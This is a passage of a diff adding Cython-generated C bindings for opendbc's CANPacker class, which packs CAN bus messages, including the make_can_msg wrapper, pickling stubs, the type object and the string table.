"opendbc/can/packer_pyx.pyx":49 + * + * cdef vector[uint8_t] val = self.pack(addr, values) + * return [addr, 0, (&val[0])[:val.size()], bus] # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_addr); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBytes_FromStringAndSize(((char *)(&(__pyx_v_val[0]))) + 0, __pyx_v_val.size() - 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyList_New(4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyList_SET_ITEM(__pyx_t_3, 1, __pyx_int_0); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __Pyx_INCREF(__pyx_v_bus); + __Pyx_GIVEREF(__pyx_v_bus); + PyList_SET_ITEM(__pyx_t_3, 3, __pyx_v_bus); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "opendbc/can/packer_pyx.pyx":41 + * return self.packer.pack(addr, values_thing) + * + * cpdef make_can_msg(self, name_or_addr, bus, values): # <<<<<<<<<<<<<< + * cdef int addr + * if type(name_or_addr) == int: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.make_can_msg", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_3make_can_msg(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10packer_pyx_9CANPacker_3make_can_msg = {"make_can_msg", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_3make_can_msg, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_3make_can_msg(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_name_or_addr = 0; + PyObject *__pyx_v_bus = 0; + PyObject *__pyx_v_values = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("make_can_msg (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name_or_addr,&__pyx_n_s_bus,&__pyx_n_s_values,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name_or_addr)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 41, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_bus)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 41, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("make_can_msg", 1, 3, 3, 1); __PYX_ERR(0, 41, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_values)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 41, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("make_can_msg", 1, 3, 3, 2); __PYX_ERR(0, 41, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "make_can_msg") < 0)) __PYX_ERR(0, 41, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_name_or_addr = values[0]; + __pyx_v_bus = values[1]; + __pyx_v_values = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("make_can_msg", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 41, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.make_can_msg", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_2make_can_msg(((struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *)__pyx_v_self), __pyx_v_name_or_addr, __pyx_v_bus, __pyx_v_values); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_2make_can_msg(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_name_or_addr, PyObject *__pyx_v_bus, PyObject *__pyx_v_values) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("make_can_msg", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_f_7opendbc_3can_10packer_pyx_9CANPacker_make_can_msg(__pyx_v_self, __pyx_v_name_or_addr, __pyx_v_bus, __pyx_v_values, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.make_can_msg", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10packer_pyx_9CANPacker_5__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_4__reduce_cython__(((struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_4__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_dbc_self_packer_cannot_be_c, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10packer_pyx_9CANPacker_7__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_6__setstate_cython__(((struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_6__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_dbc_self_packer_cannot_be_c, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc,self.packer cannot be converted to a Python object for pickling" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.packer_pyx.CANPacker.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} +static struct __pyx_vtabstruct_7opendbc_3can_10packer_pyx_CANPacker __pyx_vtable_7opendbc_3can_10packer_pyx_CANPacker; + +static PyObject *__pyx_tp_new_7opendbc_3can_10packer_pyx_CANPacker(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *)o); + p->__pyx_vtab = __pyx_vtabptr_7opendbc_3can_10packer_pyx_CANPacker; + new((void*)&(p->name_to_address)) std::map (); + return o; +} + +static void __pyx_tp_dealloc_7opendbc_3can_10packer_pyx_CANPacker(PyObject *o) { + struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *p = (struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_7opendbc_3can_10packer_pyx_CANPacker) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + __Pyx_call_destructor(p->name_to_address); + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_7opendbc_3can_10packer_pyx_CANPacker[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_7opendbc_3can_10packer_pyx_CANPacker_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_7opendbc_3can_10packer_pyx_CANPacker}, + {Py_tp_methods, (void *)__pyx_methods_7opendbc_3can_10packer_pyx_CANPacker}, + {Py_tp_init, (void *)__pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_1__init__}, + {Py_tp_new, (void *)__pyx_tp_new_7opendbc_3can_10packer_pyx_CANPacker}, + {0, 0}, +}; +static PyType_Spec __pyx_type_7opendbc_3can_10packer_pyx_CANPacker_spec = { + "opendbc.can.packer_pyx.CANPacker", + sizeof(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_7opendbc_3can_10packer_pyx_CANPacker_slots, +}; +#else + +static PyTypeObject __pyx_type_7opendbc_3can_10packer_pyx_CANPacker = { + PyVarObject_HEAD_INIT(0, 0) + "opendbc.can.packer_pyx.""CANPacker", /*tp_name*/ + sizeof(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_7opendbc_3can_10packer_pyx_CANPacker, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_7opendbc_3can_10packer_pyx_CANPacker, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_7opendbc_3can_10packer_pyx_9CANPacker_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_7opendbc_3can_10packer_pyx_CANPacker, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_n_s_CANPacker, __pyx_k_CANPacker, sizeof(__pyx_k_CANPacker), 0, 0, 1, 1}, + {&__pyx_n_s_CANPacker___reduce_cython, __pyx_k_CANPacker___reduce_cython, sizeof(__pyx_k_CANPacker___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_CANPacker___setstate_cython, __pyx_k_CANPacker___setstate_cython, sizeof(__pyx_k_CANPacker___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_CANPacker_make_can_msg, __pyx_k_CANPacker_make_can_msg, sizeof(__pyx_k_CANPacker_make_can_msg), 0, 0, 1, 1}, + {&__pyx_kp_u_Can_t_lookup, __pyx_k_Can_t_lookup, sizeof(__pyx_k_Can_t_lookup), 0, 1, 0, 0}, + {&__pyx_n_s_RuntimeError, __pyx_k_RuntimeError, sizeof(__pyx_k_RuntimeError), 0, 0, 1, 1}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_n_s__7, __pyx_k__7, sizeof(__pyx_k__7), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_bus, __pyx_k_bus, sizeof(__pyx_k_bus), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_dbc_name, __pyx_k_dbc_name, sizeof(__pyx_k_dbc_name), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_encode, __pyx_k_encode, sizeof(__pyx_k_encode), 0, 0, 1, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_iteritems, __pyx_k_iteritems, sizeof(__pyx_k_iteritems), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_make_can_msg, __pyx_k_make_can_msg, sizeof(__pyx_k_make_can_msg), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_name_or_addr, __pyx_k_name_or_addr, sizeof(__pyx_k_name_or_addr), 0, 0, 1, 1}, + {&__pyx_n_s_opendbc_can_packer_pyx, __pyx_k_opendbc_can_packer_pyx, sizeof(__pyx_k_opendbc_can_packer_pyx), 0, 0, 1, 1}, + {&__pyx_kp_s_opendbc_can_packer_pyx_pyx, __pyx_k_opendbc_can_packer_pyx_pyx, sizeof(__pyx_k_opendbc_can_packer_pyx_pyx), 0, 0, 1, 0}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_vtable, __pyx_k_pyx_vtable, sizeof(__pyx_k_pyx_vtable), 0, 0, 1, 1}, + {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_kp_s_self_dbc_self_packer_cannot_be_c, __pyx_k_self_dbc_self_packer_cannot_be_c, sizeof(__pyx_k_self_dbc_self_packer_cannot_be_c), 0, 0, 1, 0}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_u_utf8, __pyx_k_utf8, sizeof(__pyx_k_utf8), 0, 1, 0, 1}, + 